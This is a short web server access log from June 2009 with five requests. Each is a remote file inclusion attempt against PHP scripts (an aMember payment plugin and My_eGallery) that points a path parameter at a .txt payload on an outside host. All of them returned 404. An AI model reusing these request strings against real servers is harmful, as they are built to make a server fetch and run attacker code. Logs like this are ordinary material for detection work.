81.177.9.20 - - [28/Jun/2009:02:49:38 -0400] "GET /logs/access_log.Q109060900%20%20//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.254.216.47 - - [28/Jun/2009:02:51:12 -0400] "GET /logs/access_log.Q109053100//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
201.38.0.130 - - [28/Jun/2009:02:52:08 -0400] "GET /logs/access_log.Q109051300%20%20//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
201.38.0.130 - - [28/Jun/2009:02:52:31 -0400] "GET /logs/access_log.Q109060900%20%20//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
218.150.78.245 - - [28/Jun/2009:02:53:46 -0400] "GET /logs/access_log.Q109051100%20%20/modules/My_eGallery/index.php?basepath=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
